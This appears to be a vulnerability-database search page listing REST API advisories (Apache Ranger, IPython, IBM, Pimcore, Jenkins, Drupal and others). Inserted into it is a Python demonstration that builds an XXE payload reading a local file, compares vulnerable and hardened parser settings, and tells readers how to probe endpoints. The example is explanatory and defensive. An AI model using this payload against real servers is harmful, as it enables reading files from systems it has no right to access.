4950 matches found
GHSA-QQG7-GCXW-GMJ3 Apache Ranger allows users to bypass intended access restrictions via the REST API
The Policy Admin Tool in Apache Ranger before 0.5.1 allows remote authenticated users to bypass intended access restrictions via the REST API...
GHSA-7FC2-RM35-2PP7 IPython vulnerable to cross site request forgery (CSRF)
IPython (Interactive Python) is a command shell. Cross-site request forgery in the REST API is possible in IPython 2 and 3. Versions 2.4.1 and 3.2.3 contain patches...
Security Bulletin: IBM Transformation Extender Advanced is Potentially Vulnerable to an XML External Entity (XXE) Injection in its REST API.
Summary IBM 10x framework used by IBM Transformation Extender Advanced REST API is vulnerable to XXE injection. The vulnerability was reported by IBM Financial Transaction Manager for ACH Services for Multi-Platform which also uses the IBM 10x framework. Vulnerability Details CVEID: CVE-2017-1758...
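The XXE class named in the bulletin above, shown as an added example that is not code from the bulletin or from the IBM 10x framework. It uses Python's standard-library xml.sax parser: the same request body is parsed once with external general entities enabled (the vulnerable parser configuration) and once with them left disabled (the hardened configuration, and Python's default since 3.7.1). The secret file, the element names, the entity name and the function names are constructed for this demonstration; Unix-style paths are assumed for the file:// URL.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class _TextCollector(xml.sax.ContentHandler):
    """Collects character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self._chunks = []

    def characters(self, content):
        self._chunks.append(content)

    def text(self):
        return "".join(self._chunks).strip()


def parse_text(xml_bytes, resolve_external_entities):
    """Parse an XML document and return its text content.

    resolve_external_entities=True reproduces the vulnerable configuration:
    external general entities are fetched and inlined into the document.
    False is the hardened configuration (the Python default since 3.7.1).
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_payload(path):
    """Classic XXE request body: an external entity pointing at a local file.

    Element and entity names are constructed for this example; a real
    payload would target whatever document the REST endpoint accepts.
    """
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE request [\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<request><note>&xxe;</note></request>"
    ).encode()


def demo():
    """Write a constructed secret, push the XXE payload through both parser
    configurations, and return (leaked_text, hardened_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("TOPSECRET")  # constructed secret standing in for /etc/passwd
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_text(payload, resolve_external_entities=True)
        hardened = parse_text(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("external entities enabled :", repr(leaked))
    print("external entities disabled:", repr(hardened))
```

With entities enabled the file contents come back inside the parsed text; with them disabled the entity expands to nothing. The practical check for any REST endpoint that accepts XML is the same: submit a document with a SYSTEM entity pointing at a file or URL you control and see whether its contents (or an outbound request) show up.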
BWASP - BoB Web Application Security Project
BWASP (BoB Web Application Security Project) is an open-source analysis tool that supports manual web vulnerability analysis. It provides predicted information through vulnerability analysis without carrying out an attack. BWASP supports performing automated...
GHSA-Q4HW-C66H-4XQC Pimcore SQLi Vulnerability
Pimcore before 5.3.0 allows SQL Injection via the REST web service API...
GHSA-QGJQ-M78X-4GM8 Improper Authentication in Jenkins Blue Ocean Plugin
Blue Ocean allows the creation of GitHub organization folders that are set up to scan a GitHub organization for repositories and branches containing a Jenkinsfile, and create corresponding pipelines in Jenkins. Its SCM content REST API supports the pipeline creation and editing feature in Blue...
GHSA-MVXP-3J62-JQR6 Infinispan Rest API Does Not Enforce Auth Constraints
It was found that the REST API in Infinispan before version 9.0.0 did not properly enforce auth constraints. An attacker could use this vulnerability to read or modify data in the default cache or a known cache name...
GHSA-P8G6-5MG7-9R5Q Drupal REST API can bypass comment approval
In Drupal 8 prior to 8.3.7, when using the REST API, users without the correct permission can post comments via REST that are approved even if the user does not have permission to post approved comments. This issue only affects sites that have the RESTful Web Services rest module enabled, the...
GHSA-6Q78-6XVR-26FG Jenkins Groovy Plugin sandbox bypass vulnerability
Jenkins Script Security sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements. Both the pipeline validation REST APIs and actual script/pipeline execution are affected. This allowed users with...
ManageEngine Password Manager Pro REST API Restriction Bypass (CVE-2022-29081)
Binary data manageenginepmpcve-2022-29081.nbin...
Security Bulletin: IBM MQ WebConsole and REST API are affected by CVE-2021-39031.
Summary An issue was identified within the IBM WebSphere Application Server Liberty profile that IBM MQ uses to provide web console and REST API functionality. Vulnerability Details CVEID: CVE-2021-39031 DESCRIPTION: IBM WebSphere Application Server - Liberty 17.0.0.3 through 22.0.0.1 could allow...
CVE-2022-1338
The Easily Generate Rest API Url WordPress plugin through 1.0.0 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed...
Authentication flaw
Brocade SANnav before version 2.2.0 logs the REST API authentication token in plain text...
CVE-2022-1338 Easily Generate Rest API Url <= 1.0.0 - Admin+ Stored Cross-Site Scripting
The Easily Generate Rest API Url WordPress plugin through 1.0.0 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed...